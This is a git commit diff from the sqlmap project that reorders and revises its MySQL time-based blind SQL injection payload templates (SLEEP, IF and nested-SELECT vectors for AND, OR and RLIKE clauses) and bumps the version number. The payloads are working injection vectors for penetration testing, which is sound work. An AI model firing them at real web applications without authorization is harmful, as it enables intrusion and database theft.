Minor revisiting of MySQL time-based payloads

This commit is contained in:
Miroslav Stampar 2019-05-20 12:41:41 +02:00
parent 79d0c83f8f
commit e1ab969fce
2 changed files with 99 additions and 97 deletions

View File

@ -18,7 +18,7 @@ from lib.core.enums import OS
from thirdparty.six import unichr as _unichr from thirdparty.six import unichr as _unichr
# sqlmap version (<major>.<minor>.<month>.<monthly commit>) # sqlmap version (<major>.<minor>.<month>.<monthly commit>)
VERSION = "1.3.5.114" VERSION = "1.3.5.115"
TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable"
TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34}
VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE)

View File

@ -2,98 +2,18 @@
<root> <root>
<!-- Time-based boolean tests --> <!-- Time-based boolean tests -->
<test>
<title>MySQL &gt;= 5.0.12 AND time-based blind</title>
<stype>5</stype>
<level>1</level>
<risk>1</risk>
<clause>1,2,3,8,9</clause>
<where>1</where>
<vector>AND [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])</vector>
<request>
<payload>AND SLEEP([SLEEPTIME])</payload>
</request>
<response>
<time>[SLEEPTIME]</time>
</response>
<details>
<dbms>MySQL</dbms>
<dbms_version>&gt;= 5.0.12</dbms_version>
</details>
</test>
<test>
<title>MySQL &gt;= 5.0.12 OR time-based blind</title>
<stype>5</stype>
<level>1</level>
<risk>3</risk>
<clause>1,2,3,9</clause>
<where>1</where>
<vector>OR [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])</vector>
<request>
<payload>OR SLEEP([SLEEPTIME])</payload>
</request>
<response>
<time>[SLEEPTIME]</time>
</response>
<details>
<dbms>MySQL</dbms>
<dbms_version>&gt;= 5.0.12</dbms_version>
</details>
</test>
<test>
<title>MySQL &gt;= 5.0.12 AND time-based blind (comment)</title>
<stype>5</stype>
<level>3</level>
<risk>1</risk>
<clause>1,2,3,9</clause>
<where>1</where>
<vector>AND [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])</vector>
<request>
<payload>AND SLEEP([SLEEPTIME])</payload>
<comment>#</comment>
</request>
<response>
<time>[SLEEPTIME]</time>
</response>
<details>
<dbms>MySQL</dbms>
<dbms_version>&gt;= 5.0.12</dbms_version>
</details>
</test>
<test>
<title>MySQL &gt;= 5.0.12 OR time-based blind (comment)</title>
<stype>5</stype>
<level>3</level>
<risk>3</risk>
<clause>1,2,3,9</clause>
<where>1</where>
<vector>OR [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])</vector>
<request>
<payload>OR SLEEP([SLEEPTIME])</payload>
<comment>#</comment>
</request>
<response>
<time>[SLEEPTIME]</time>
</response>
<details>
<dbms>MySQL</dbms>
<dbms_version>&gt;= 5.0.12</dbms_version>
</details>
</test>
<!-- Prefering "query SLEEP" over "SLEEP" because of JOIN-alike cases where SLEEPs get called multiple times (e.g. http://testphp.vulnweb.com/listproducts.php?cat=1) -->
<test> <test>
<title>MySQL &gt;= 5.0.12 AND time-based blind (query SLEEP)</title> <title>MySQL &gt;= 5.0.12 AND time-based blind (query SLEEP)</title>
<stype>5</stype> <stype>5</stype>
<level>2</level> <level>1</level>
<risk>1</risk> <risk>1</risk>
<clause>1,2,3,8,9</clause> <clause>1,2,3,8,9</clause>
<where>1</where> <where>1</where>
<vector>AND (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</vector> <vector>AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</vector>
<request> <request>
<payload>AND (SELECT * FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR])</payload> <payload>AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR])</payload>
</request> </request>
<response> <response>
<time>[SLEEPTIME]</time> <time>[SLEEPTIME]</time>
@ -107,13 +27,95 @@
<test> <test>
<title>MySQL &gt;= 5.0.12 OR time-based blind (query SLEEP)</title> <title>MySQL &gt;= 5.0.12 OR time-based blind (query SLEEP)</title>
<stype>5</stype> <stype>5</stype>
<level>1</level>
<risk>3</risk>
<clause>1,2,3,9</clause>
<where>1</where>
<vector>OR (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</vector>
<request>
<payload>OR (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR])</payload>
</request>
<response>
<time>[SLEEPTIME]</time>
</response>
<details>
<dbms>MySQL</dbms>
<dbms_version>&gt;= 5.0.12</dbms_version>
</details>
</test>
<test>
<title>MySQL &gt;= 5.0.12 AND time-based blind (SLEEP)</title>
<stype>5</stype>
<level>2</level>
<risk>1</risk>
<clause>1,2,3,8,9</clause>
<where>1</where>
<vector>AND [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])</vector>
<request>
<payload>AND SLEEP([SLEEPTIME])</payload>
</request>
<response>
<time>[SLEEPTIME]</time>
</response>
<details>
<dbms>MySQL</dbms>
<dbms_version>&gt;= 5.0.12</dbms_version>
</details>
</test>
<test>
<title>MySQL &gt;= 5.0.12 OR time-based blind (SLEEP)</title>
<stype>5</stype>
<level>2</level> <level>2</level>
<risk>3</risk> <risk>3</risk>
<clause>1,2,3,9</clause> <clause>1,2,3,9</clause>
<where>1</where> <where>1</where>
<vector>OR (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</vector> <vector>OR [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])</vector>
<request> <request>
<payload>OR (SELECT * FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR])</payload> <payload>OR SLEEP([SLEEPTIME])</payload>
</request>
<response>
<time>[SLEEPTIME]</time>
</response>
<details>
<dbms>MySQL</dbms>
<dbms_version>&gt;= 5.0.12</dbms_version>
</details>
</test>
<test>
<title>MySQL &gt;= 5.0.12 AND time-based blind (SLEEP - comment)</title>
<stype>5</stype>
<level>3</level>
<risk>1</risk>
<clause>1,2,3,9</clause>
<where>1</where>
<vector>AND [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])</vector>
<request>
<payload>AND SLEEP([SLEEPTIME])</payload>
<comment>#</comment>
</request>
<response>
<time>[SLEEPTIME]</time>
</response>
<details>
<dbms>MySQL</dbms>
<dbms_version>&gt;= 5.0.12</dbms_version>
</details>
</test>
<test>
<title>MySQL &gt;= 5.0.12 OR time-based blind (SLEEP - comment)</title>
<stype>5</stype>
<level>3</level>
<risk>3</risk>
<clause>1,2,3,9</clause>
<where>1</where>
<vector>OR [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])</vector>
<request>
<payload>OR SLEEP([SLEEPTIME])</payload>
<comment>#</comment>
</request> </request>
<response> <response>
<time>[SLEEPTIME]</time> <time>[SLEEPTIME]</time>
@ -131,9 +133,9 @@
<risk>1</risk> <risk>1</risk>
<clause>1,2,3,9</clause> <clause>1,2,3,9</clause>
<where>1</where> <where>1</where>
<vector>AND (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</vector> <vector>AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</vector>
<request> <request>
<payload>AND (SELECT * FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR])</payload> <payload>AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR])</payload>
<comment>#</comment> <comment>#</comment>
</request> </request>
<response> <response>
@ -152,9 +154,9 @@
<risk>3</risk> <risk>3</risk>
<clause>1,2,3,9</clause> <clause>1,2,3,9</clause>
<where>1</where> <where>1</where>
<vector>OR (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</vector> <vector>OR (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</vector>
<request> <request>
<payload>OR (SELECT * FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR])</payload> <payload>OR (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR])</payload>
<comment>#</comment> <comment>#</comment>
</request> </request>
<response> <response>
@ -296,9 +298,9 @@
<risk>1</risk> <risk>1</risk>
<clause>1,2,3,9</clause> <clause>1,2,3,9</clause>
<where>1</where> <where>1</where>
<vector>RLIKE (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</vector> <vector>RLIKE (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</vector>
<request> <request>
<payload>RLIKE (SELECT * FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR])</payload> <payload>RLIKE (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR])</payload>
</request> </request>
<response> <response>
<time>[SLEEPTIME]</time> <time>[SLEEPTIME]</time>
@ -316,9 +318,9 @@
<risk>1</risk> <risk>1</risk>
<clause>1,2,3,9</clause> <clause>1,2,3,9</clause>
<where>1</where> <where>1</where>
<vector>RLIKE (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</vector> <vector>RLIKE (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</vector>
<request> <request>
<payload>RLIKE (SELECT * FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR])</payload> <payload>RLIKE (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR])</payload>
<comment>#</comment> <comment>#</comment>
</request> </request>
<response> <response>
@ -1490,9 +1492,9 @@
<risk>1</risk> <risk>1</risk>
<clause>1,2,3,9</clause> <clause>1,2,3,9</clause>
<where>3</where> <where>3</where>
<vector>(SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</vector> <vector>(SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</vector>
<request> <request>
<payload>(SELECT * FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR])</payload> <payload>(SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR])</payload>
</request> </request>
<response> <response>
<time>[SLEEPTIME]</time> <time>[SLEEPTIME]</time>